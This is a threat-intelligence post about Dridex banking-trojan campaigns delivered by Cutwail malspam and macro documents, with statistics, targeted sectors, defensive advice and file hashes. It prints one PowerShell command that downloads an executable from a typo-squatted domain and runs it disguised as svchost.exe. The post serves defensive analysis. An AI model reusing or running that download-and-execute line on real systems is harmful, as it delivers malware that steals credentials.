Dridex is Campaigning Again

8705079899?profile=RESIZE_400xRecently, IBM X-Force threat intelligence has been observing a rise in Dridex Banking Trogan related network attacks that are being driven by the Cutwail botnet.  Also known as Pushdo or Pandex botnet.  Cutwail botnet is originally infected by Cutwail Trojan, a malware able to download and execute files. Cutwail is a famous spam bot widely used in large-scale spam campaigns. It also serves as a DDoS botnet sending SSL attacks. Dridex is delivered as a second-stage infector after an initial document or spreadsheet arrives via email with booby-trapped macros. Dridex also known as Bugat and Cridex is a form of malware that specializes in stealing bank credentials. Recipients who activate the macros unknowingly launch malicious PowerShell scripts that will download additional malware.

At this time, X-Force is seeing relatively limited campaigns active in Italy and Japan.  The initial infection vector of the attacks we are observing is malspam email. Recipients receive unsolicited messages containing Microsoft Office file attachments, often delivered via the Cutwail botnet. Cutwail itself has been a prominent spamming infrastructure in the cybercrime arena, named as the largest of its kind in 2009, and continues to spread spam for elite malware-wielding gangs in 2021.

Overall, at least 34% of all PowerShell-based attacks X-Force has seen since June 2020 were ultimately linked with a Dridex payload. The PowerShell uptick became apparent in early 2020 and started rising more considerably in May 2020.

X-Force observed activity spikes in December 2020, which accounted for an 80% increase in the overall number of malicious PowerShell attacks compared to the preceding six-month period. In January 2021, X-Force observed a sudden decline in both PowerShell attacks as well as the embedded Dridex attacks, likely as the campaign ended and a new one started using a different macro variant and other scripts.

8705075061?profile=RESIZE_584x

 

Figure 1: PowerShell network attacks per month

In the cases X-Force analyzed, PowerShell is instructed to bypass the local execution policy and then runs a Base64-encoded command, which results in a request to browse to what is supposed to appear like a Microsoft update URL. The script fetches a malicious executable file from that typo-squatted domain. These specific steps change per variant and campaign.

(New-Object System.Net.WebClient).DownloadFile(‘http://updates.ms0ffice[.]net/upd20991.exe’,”${Env:SystemRoot}\Temp\svchost.exe”); Start-Process “${Env:SystemRoot}\Temp\svchost.exe”;

The executable file is the Dridex payload. To evade detection, it disguises itself as a service host process and begins to run its data-stealing mechanisms.

 

8705077862?profile=RESIZE_584x

Figure 2: Dridex infection flow from PowerShell scripts

While Dridex is a banking Trojan, it is not necessarily always used as such. In some cases, its operators, known as the ‘Evil Corp’ gang, may leverage its ability to steal credentials on the fly or present victims with web injections. In other cases, Dridex is employed as a bot-herding tool that is a powerful information stealer. Since it is also a persistent device infector, it is known to be part of high-stakes ransomware attacks. In this regard, Dridex has been linked with ransomware like BitPaymer and DoppelPaymer, as an example.

When looking at the sectors targeted most often in managed security services networks, X-Force is seeing that health care is the top target of the overall increase in PowerShell attacks. Followed by the financial sector and by retailers, health care has been seeing no less than an epidemic of cyberattacks on organizational networks since the COVID pandemic broke. This is due to the sector being a critical part of the response to COVID and one where human life can be impacted by a cyberattack. In many cases, ransomware attacks seek to compromise hospitals for the inherent pressure they would have to pay hefty ransoms to protect patients and resume operations.

Dridex is in business with other cybercrime groups that have roots in the elite criminal arena in Eastern Europe. In the past, Dridex’s top spamming service was Necurs. When tactics changed from widespread infections to more targeted attacks, Dridex moved on and away from Necurs, keeping Emotet as the botnet that opens doors for it to enter corporate networks.  The Necurs botnet is one of the largest networks in the spam email threat ecosystem, with victims in nearly every country in the world. As an example, one Necurs infected computer sent a total of 3.8 million spam emails to over 40.6 million potential victims.  Since Emotet suffered a recent major blow by law enforcement, which botnet will be used next?

In campaigns that X-Force observed starting in early January 2021, it appears that Dridex is testing a couple of avenues. It has been spreading through the Rig Exploit Kit, the Cutwail botnet and, in some cases, through the QakBot botnet. Its activity, detected in Italy and Japan, remains relatively low.  First documented in 2008, Qbot (aka QuakBot, QakBot, or Pinkslipbot) has evolved over the years from an information stealer to a "Swiss Army knife" adept in delivering other kinds of malware, including Prolock ransomware, and even remotely connect to a target's Windows system to carry out banking transactions from the victim's IP address.

A Dridex malware infection on enterprise devices opens a door to more serious issues down the line. It can involve the theft of money from the company’s bank account or from infected employee accounts, or it can be as grave as a full-fledged targeted ransomware and extortion attack. Damage can go from a few million dollars to hundreds of millions in the overall incident response process, regulatory fines, lawsuits and more. When it comes to malware, prepare for the worst:

  • Educate employees about the latest phishing techniques to assist them in spotting suspicious emails and refraining from opening unsolicited attachments.
  • Security teams should employ applicable Yara rules to assist in detecting malicious PowerShell use. Monitor for suspicious PowerShell commands and events.
  • Tune your organization’s SIEM system with enhanced malicious PowerShell detection capabilities.
  • Incorporate known Dridex, PowerShell and BitPaymer indicators of compromise (IOCs) into your security monitoring.
  • Consider a managed detection and response solution to secure your endpoints.

 

 

Indicators: 

File name: upd20991.exe

File type: Win32 EXE

MD5: d759be13337417afa7b09617d0631a1c

SHA-1:  8b1a421c02579558862614ce136210b1480f9622

SHA-256: a32cb8a2260c89b904f4e2a3ab30432ffd94d7a56a4a7ae4b3bac2d1b8a90f68

Red Sky Alliance has been has analyzing and documenting cyber threats for 9 years and maintains a resource library of malware and cyber actor reports available at https://redskyalliance.org at no charge.

Red Sky Alliance is   a   Cyber   Threat   Analysis   and   Intelligence Service organization.  For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or feedback@wapacklabs.com.

 

Reporting: https://www.redskyalliance.org/

Website:   https://www.wapacklabs.com/

LinkedIn: https://www.linkedin.com/company/wapacklabs/

Twitter:     https://twitter.com/wapacklabs?lang=en

Weekly Cyber Intelligence Briefings: 

https://attendee.gotowebinar.com/register/8782169210544615949

 

TR-21-082-001_Dridex_Campaign.pdf

 

E-mail me when people leave their comments –

You need to be a member of Red Sky Alliance to add comments!